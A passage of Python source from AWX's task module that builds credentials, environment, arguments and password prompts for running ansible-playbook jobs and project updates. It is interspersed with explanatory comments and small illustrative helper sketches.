self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
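# For example (hypothetical credentials), a job with a machine credential and
# two vault credentials whose vault_ids are 'dev' and 'prod' could yield
# roughly:
#   {'yes': 'yes', 'no': 'no', '': '',
#    'ssh_password': '...', 'become_password': '...',
#    'vault_password.dev': '...', 'vault_password.prod': '...'}
# The 'vault_password.<id>' keys later drive '--vault-id <id>@prompt' in
# build_args and the matching prompt regexes in get_password_prompts.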
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack':
env['OS_CLIENT_CONFIG_FILE'] = os.path.join('/runner', os.path.basename(cred_files.get(cloud_cred, '')))
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: again, figure out more elegant way for inside container
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
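# As a rough illustration of the path_vars handling above: if neither the
# task environment nor ansible.cfg overrides roles_path, ANSIBLE_ROLES_PATH
# ends up as (paths shown for illustration only):
#   /runner/requirements_roles:~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles
# i.e. the folder synced from project requirements is prepended to the
# defaults.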
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_cwd(self, job, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability to create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
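# Sketch of the safe_dict behaviour described above, with hypothetical vars:
#   extra_vars = {'greeting': '{{ lookup("env", "HOME") }}', 'count': 3}
#   safe_dict  = {'count': 3}   # top-level keys defined on the Job Template
# With ALLOW_JINJA_IN_EXTRA_VARS='template', safe_yaml.safe_dump() emits
# 'count' normally but tags the templated 'greeting' value so Jinja2 does
# not render it at playbook runtime.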
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that the local tree is
# up-to-date with the project, and the job is running the project's current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# run inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
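# A minimal illustrative sketch (not from the original module) restating the
# "does this job need a project sync first?" decision made in pre_run_hook above,
# with simplified, hypothetical inputs:
def _needs_project_sync(scm_type, project_path_exists, local_head_revision, wanted_revision, branch_override):
    if not scm_type:
        return False  # manual projects are never synced
    if not project_path_exists:
        return True  # a fresh clone is required
    if scm_type == 'git' and wanted_revision and not branch_override:
        # sync only when the wanted commit is not already checked out locally
        return wanted_revision != local_head_revision
    return True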
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = str(True)
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
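# A minimal illustrative sketch (not from the original module) of the env-var naming
# scheme the Galaxy credential loop above produces, assuming hypothetical
# (url, token, auth_url) tuples in place of credential objects:
def _galaxy_env_sketch(creds):
    env, servers = {}, []
    for i, (url, token, auth_url) in enumerate(creds):
        env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = url
        if token:
            env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
        if auth_url:
            env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
        servers.append(f'server{i}')
    if servers:
        env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(servers)
    return env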
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_cwd(self, project_update, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
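# A minimal illustrative sketch (not from the original module): the prompt dict built
# above is presumably matched against process output line by line, roughly like this
# hypothetical helper, where d is the dict returned by get_password_prompts():
import re
def _match_prompt(output_line, prompts):
    for pattern, password_name in prompts.items():
        if re.search(pattern, output_line):
            return password_name
    return None
# e.g. _match_prompt("Password for 'https://example.org':", d) would yield 'scm_password'.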
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
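# A minimal illustrative sketch (not from the original module) of the locking pattern
# used by acquire_lock() above: poll a non-blocking fcntl lock so a cancel request can
# interrupt the wait. Names and the should_cancel callback are hypothetical.
import errno
import fcntl
import os
import time
def _poll_lockf(path, should_cancel, interval=1.0):
    fd = os.open(path, os.O_RDWR | os.O_CREAT)
    while not should_cancel():
        try:
            fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
            return fd  # caller must lockf(fd, LOCK_UN) and close when done
        except IOError as e:
            if e.errno not in (errno.EAGAIN, errno.EACCES):
                os.close(fd)
                raise
            time.sleep(interval)
    os.close(fd)
    return None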
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but lives in a vendored directory;
# to be consistent with the ansible-runner model,
# it is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
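# A minimal illustrative sketch (not from the original module) of the copy strategy used
# by make_local_copy() above for git projects: pin a temporary branch at the wanted
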